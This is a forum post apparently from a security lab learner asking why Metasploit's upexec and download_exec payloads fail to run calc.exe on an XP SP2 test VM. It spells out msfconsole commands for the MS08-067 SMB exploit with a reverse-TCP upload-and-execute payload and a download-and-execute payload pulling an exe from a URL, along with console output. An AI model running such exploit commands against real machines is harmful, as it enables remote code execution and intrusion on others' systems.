HiramKey Posted February 1, 2011 Share Posted February 1, 2011 I never explored the upexec and download_exec payloads of the metasploit framework. So the purpose of the test is to download / upload and execute an exe file as payload. To make some tests I’m using two VM, one with BT4 RC2 and an XP Sp2 as victim. The victim has the firewall disabled and no antivirus. I’m trying to upload/download and execute the windows calculator (calc.exe) I know that with a meterpeter session is possible with a simple upload and execute, but I’m experiencing some problems with both the following procedures: 1 ------------ WITH UPEXEC: use exploit/windows/smb/ms08_067_netapi set payload windows/upexec/reverse_tcp set lhost 192.168.1.1 set rhost 192.168.1.2 set pexec /root/data/payloads/test/calc.exe exploit I got… Started reverse handler on 192.168.1.1:4444 Automatically detecting the target... Fingerprint: Windows XP - Service Pack 2 Selected Target: Windows XP SP2 (NX) Attempting to trigger the vulnerability... Sending stage (398 bytes) to 192.168.1.2 Sleeping before handling stage... And it hang so without any result, the victim do not run the calc.exe 2 ------------ WITH DOWNLOAD_EXEC: use exploit/windows/smb/ms08_067_netapi set payload windows/download_exec set lhost 192.168.1.1 set rhost 192.168.1.2 set url http://192.168.1.1/c.exe (httpd obviously active) exploit I got… Automatically detecting the target... Fingerprint: Windows XP - Service Pack 2 Selected Target: Windows XP SP2 (NX) Attempting to trigger the vulnerability... Exploit completed, but no session was created. Even in that case the exe will not be executed on the victim… So I think I’m missing something: 1. Am I doing something wrong with the procedure? 2. Does a win32 exe need to be pre encoded in a different format to be injected? Does somebody here on the community able to use that payload and so kind to help me. Namasté. Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.